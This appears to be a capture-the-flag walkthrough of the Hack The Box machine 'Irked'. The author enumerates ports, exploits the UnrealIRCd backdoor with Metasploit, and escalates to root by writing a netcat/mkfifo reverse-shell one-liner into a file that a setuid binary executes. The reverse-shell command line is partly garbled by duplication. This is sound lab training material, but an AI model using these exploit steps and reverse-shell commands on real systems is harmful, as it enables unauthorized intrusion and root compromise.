Walkthrough - Irked

Tags: , ,

Categories: ,


This was a decent box. An IRC exploit gets you a shell with the IRC user but not the local user. There are two methods to get a privilege escalation. One is a bit CTFy which I have not included in this walkthrough and the other is using a setuid binary that gets us a root shell. Overall this was a good box.


Before following this walkthrough, I highly recommend trying to get the flag yourself! Just like you will hear from everyone else, try harder! (if you cannot find it)


First up, we’ll scan the box using basic nmap scripts and then go from there (Enumerate!).

kali@noone:~/Irked$ nmap -v -p- -sC -sV -oA nmap
# Nmap 7.70 scan initiated Sun Feb 10 20:26:11 2019 as: nmap -v -p- -sC -sV -oA nmap
Nmap scan report for
Host is up (0.25s latency).
Not shown: 65528 closed ports
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesnt have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          53857/udp  status
|_  100024  1          59504/tcp  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
59504/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 10 20:44:03 2019 -- 1 IP address (1 host up) scanned in 1072.35 seconds

We have a few ports open. A few weird ports with IRC service running on them. But lets start with the most common way, port 80.


Just a smiley. I am going to pivot and do something else. A searchsploit on UnrealIRCd got me this.

kali@noone:~/Irked$ searchsploit UnrealIRCd
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                               |  Path
                                                                                                                                                                                             | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
UnrealIRCd - Backdoor Command Execution (Metasploit)                                                                                                                                 | exploits/linux/remote/16922.rb
UnrealIRCd - Local Configuration Stack Overflow                                                                                                                                      | exploits/windows/dos/18011.txt
UnrealIRCd - Remote Downloader/Execute                                                                                                                                               | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                                                                                                                                    | exploits/windows/dos/27407.pl
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result


There’s a metasploit module. Let’s try it out.

root@noone:/home/pswapnil/Retired/Irked# msfconsole
msf5 > search unreal                                                                                                                                                                                                         

Matching Modules                                                                                                                                                                                                             

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   1  exploit/linux/games/ut2004_secure           2004-06-18       good       Yes    Unreal Tournament 2004 "secure" Overflow (Linux)
   2  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD Backdoor Command Execution                                                                                                    
   3  exploit/windows/games/ut2004_secure         2004-06-18       good       Yes    Unreal Tournament 2004 "secure" Overflow (Win32)                                                               

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor                                                                                                                                                                        
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options                                                                                                                                                              

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):                                                                                                                                                                

   Name    Current Setting  Required  Description                                             
   ----    ---------------  --------  -----------                
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   6667             yes       The target port (TCP)

Exploit target:                                          

   Id  Name                                                                     
   --  ----                                                                     
   0   Automatic Target                                                         

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS      
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6697
RPORT => 6697                                                                    
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on
[*] - Connected to
    :irked.htb NOTICE AUTH :*** Looking up your hostname...                    
[*] - Sending backdoor command...                             
[*] Accepted the first client connection...                                     
[*] Accepted the second client connection...                                    
[*] Command: echo NYsVwSUaezV0FKxG;                                             
[*] Writing to socket A                                                         
[*] Writing to socket B                                                         
[*] Reading from sockets...                                                     
[*] Reading from socket A                                                       
[*] A: "NYsVwSUaezV0FKxG\r\n"                                                   
[*] Matching...                                                                 
[*] B is input...                                                                                
[*] Command shell session 1 opened ( -> at 2019-04-29 12:07:43 -0400

uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

Setuid binary

I will upgrade to a full TTY. To know how I did that, follow this.

ircd@irked:~$ cd /home
ircd@irked:/home$ ls -la
total 16
drwxr-xr-x  4 root     root     4096 May 14  2018 .
drwxr-xr-x 21 root     root     4096 May 15  2018 ..
drwxr-xr-x 18 djmardov djmardov 4096 Apr 30 08:28 djmardov
drwxr-xr-x  3 ircd     root     4096 May 15  2018 ircd
ircd@irked:/home$ find / -perm -u=s -type f 2>/dev/null
ircd@irked:/home$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-04-03 06:34 (:0)
djmardov pts/2        2019-04-04 09:01 (
sh: 1: /tmp/listusers: not found

The viewuser binary is searching for a file /tmp/listusers. Let’s see if we can write to this file. I will try to upload a shell command in the file and start a listener on my local machine.

ircd@irked:/home$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 6666 >/tmp/f" > /tmp/listusers <;cat /tmp/f|/bin/sh -i 2>&1 | nc <my-ip> 6666 > /tmp/f" > /tmp/listusers

Now let’s try to execute the binary again and see if we pop a shell.

ircd@irked:/home$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-05-11 07:04 (:0)

What do you know! We popped a shell on the listener we started and it’s a root shell!

kali@noone:~/Irked$ nc -lnvp 6666
listening on [any] 6666 ...
connect to [] from (UNKNOWN) [] 54261
# id     
uid=0(root) gid=1001(ircd) groups=1001(ircd)
# cat /root/root.txt
# locate user.txt
# cat /home/djmardov/Documents/user.txt

This is definetely the first time I am showing the root.txt file before the user.txt file. I guess that’s what happens when you try to do your recon thoroughly before trying to score points on HTB. Great box nonetheless!